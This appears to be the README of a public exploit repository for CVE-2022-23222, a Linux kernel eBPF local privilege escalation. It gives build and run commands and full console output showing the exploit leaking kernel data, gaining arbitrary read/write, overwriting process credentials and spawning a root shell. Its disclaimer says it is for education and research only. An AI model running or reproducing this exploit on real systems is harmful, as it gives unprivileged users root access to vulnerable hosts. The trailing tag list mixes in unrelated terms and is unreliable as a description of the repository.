tr3ee/CVE-2022-23222

# CVE-2022-23222 中文 writeup: https://tr3e.ee/posts/cve-2022-23222-linux-kernel-ebpf-lpe.txt 仅供教育/研究目的。使用风险自负。 ## 构建与运行 ``` $ make cc -I include -static -w -o exploit exploit.c $ ./exploit [*] phase(1/8) 'create bpf map(s)' running [+] phase(1/8) 'create bpf map(s)' done [*] phase(2/8) 'do some leak' running [+] phase(2/8) 'do some leak' done [*] phase(3/8) 'prepare arbitrary rw' running [+] phase(3/8) 'prepare arbitrary rw' done [*] phase(4/8) 'spawn processes' running [+] phase(4/8) 'spawn processes' done [*] phase(5/8) 'find cred (slow)' running [+] phase(5/8) 'find cred (slow)' done [*] phase(6/8) 'overwrite cred' running [+] phase(6/8) 'overwrite cred' done [*] phase(7/8) 'spawn root shell' running [+] Enjoy root! # id uid=0(root) gid=0(root) groups=65534(nobody) # 退出 [+] phase(7/8) 'spawn root shell' done [*] phase(8/8) 'clean up the mess' running [+] phase(8/8) 'clean up the mess' done ```

标签：0day挖掘, cred结构体, CVE-2022-23222, Cybersecurity, Docker镜像, eBPF提权, Exploit, Linux内核漏洞, PoC, Rootkit, Web报告查看器, Zeek, 任意读写, 内核安全, 子域名枚举, 安全渗透, 客户端加密, 客户端加密, 提权漏洞, 暴力破解, 本地权限提升, 系统安全